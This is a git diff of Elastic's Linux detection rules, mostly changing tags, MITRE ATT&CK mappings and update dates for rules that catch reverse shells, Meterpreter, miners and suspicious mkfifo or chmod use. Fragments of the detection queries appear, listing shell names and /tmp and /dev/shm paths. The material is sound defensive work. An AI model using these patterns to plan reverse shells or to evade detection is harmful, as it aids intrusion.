"eql" query = ''' @@ -96,19 +106,6 @@ process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -123,3 +120,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml index 70bad06fdd8..b1d6944dd41 100644 --- a/rules/linux/execution_shell_via_child_tcp_utility_linux.toml +++ b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -84,7 +84,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=5s @@ -101,19 +108,6 @@ sequence by host.id, process.entity_id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -128,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_java_revshell_linux.toml b/rules/linux/execution_shell_via_java_revshell_linux.toml index 45f7f7ec55b..ca489d0cc11 100644 --- a/rules/linux/execution_shell_via_java_revshell_linux.toml +++ b/rules/linux/execution_shell_via_java_revshell_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -139,3 +139,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml index 434c19d770b..26b891475de 100644 --- a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml +++ b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1s @@ -114,19 +121,6 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -137,17 +131,20 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.011" -name = "Lua" -reference = "https://attack.mitre.org/techniques/T1059/011/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml index 3bdb54b7611..8e75039764d 100644 --- a/rules/linux/execution_shell_via_meterpreter_linux.toml +++ b/rules/linux/execution_shell_via_meterpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -61,7 +61,14 @@ However, if more advanced configuration is required to detect specific behavior, -w /etc/passwd -p wa -k passwd """ severity = "high" -tags = ["Tactic: Discovery", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,26 +118,29 @@ Meterpreter is a sophisticated payload within the Metasploit framework, enabling framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat.technique.subtechnique]] -id = "T1087.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1087/001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml index 356cfbbcded..ed5b8943ef7 100644 --- a/rules/linux/execution_shell_via_suspicious_binary.toml +++ b/rules/linux/execution_shell_via_suspicious_binary.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -83,7 +83,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1s @@ -109,19 +116,6 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -136,3 +130,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml index 3623af76665..c8be644cd99 100644 --- a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -99,19 +106,6 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -126,3 +120,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml index 80a1c2d1c61..35f575a8b8e 100644 --- a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -95,7 +95,14 @@ However, if more advanced configuration is required to detect specific behavior, - For this detection rule no additional audit rules are required to be added to the integration. """ severity = "medium" -tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -120,19 +127,6 @@ sample by host.id, process.pid, process.parent.pid [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -147,3 +141,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml index c5e14b5e1f1..19461e6ab6b 100644 --- a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml +++ b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -85,7 +85,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,16 +109,29 @@ not (process.parent.name in ("sh", "sudo") and ?process.parent.command_line : "* [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.015" -name = "Compression" -reference = "https://attack.mitre.org/techniques/T1027/015/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml index 9dde89eea91..880ff976e63 100644 --- a/rules/linux/execution_suspicious_executable_running_system_commands.toml +++ b/rules/linux/execution_suspicious_executable_running_system_commands.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -81,7 +81,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -113,39 +121,20 @@ process.parent.executable:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" - -[[rule.threat.technique]] -id = "T1049" -name = "System Network Connections Discovery" -reference = "https://attack.mitre.org/techniques/T1049/" - -[[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml index d66c1399690..30a5f83b43b 100644 --- a/rules/linux/execution_suspicious_mining_process_creation_events.toml +++ b/rules/linux/execution_suspicious_mining_process_creation_events.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/08" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -77,7 +77,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -97,29 +107,16 @@ file where host.os.type == "linux" and event.type == "creation" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1543.002" -name = "Systemd Service" -reference = "https://attack.mitre.org/techniques/T1543/002/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_suspicious_mkfifo_execution.toml b/rules/linux/execution_suspicious_mkfifo_execution.toml index 1d324c1339f..2db8e46b29d 100644 --- a/rules/linux/execution_suspicious_mkfifo_execution.toml +++ b/rules/linux/execution_suspicious_mkfifo_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -84,7 +84,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -96,6 +106,11 @@ process.args:((/dev/shm/* or /tmp/* or /var/tmp/*) and not (/*fifo* or /var/tmp/ [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Execution" +id = "TA0002" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -106,15 +121,19 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +name = "Command and Control" +id = "TA0011" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +name = "Application Layer Protocol" +id = "T1071" +reference = "https://attack.mitre.org/techniques/T1071/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml index 7fcc1c718a0..a35ae4ec714 100644 --- a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml +++ b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/08" [rule] author = ["Elastic"] @@ -58,7 +58,21 @@ This rule flags pods or containers started via orchestration or runtime tools th risk_score = 47 rule_id = "c595363f-52a6-49e1-9257-0e08ae043dbd" severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -103,9 +117,17 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1611" +name = "Escape to Host" +reference = "https://attack.mitre.org/techniques/T1611/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml index a9a9dab2bc1..c9804ea2744 100644 --- a/rules/linux/execution_system_binary_file_permission_change.toml +++ b/rules/linux/execution_system_binary_file_permission_change.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -78,7 +78,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -110,16 +117,11 @@ process.args in ("4755", "755", "000", "777", "444", "+x") and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" - -[[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml index ea6f456d2d8..52cc47e2b35 100644 --- a/rules/linux/execution_tc_bpf_filter.toml +++ b/rules/linux/execution_tc_bpf_filter.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -90,7 +90,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: TripleCross", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: TripleCross", + "Data Source: Auditd Manager", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -104,16 +116,16 @@ not ?process.parent.executable == "/usr/sbin/libvirtd" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1562.004" -name = "Disable or Modify System Firewall" -reference = "https://attack.mitre.org/techniques/T1562/004/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml index a12234501a0..6c81fd12cc5 100644 --- a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml +++ b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] 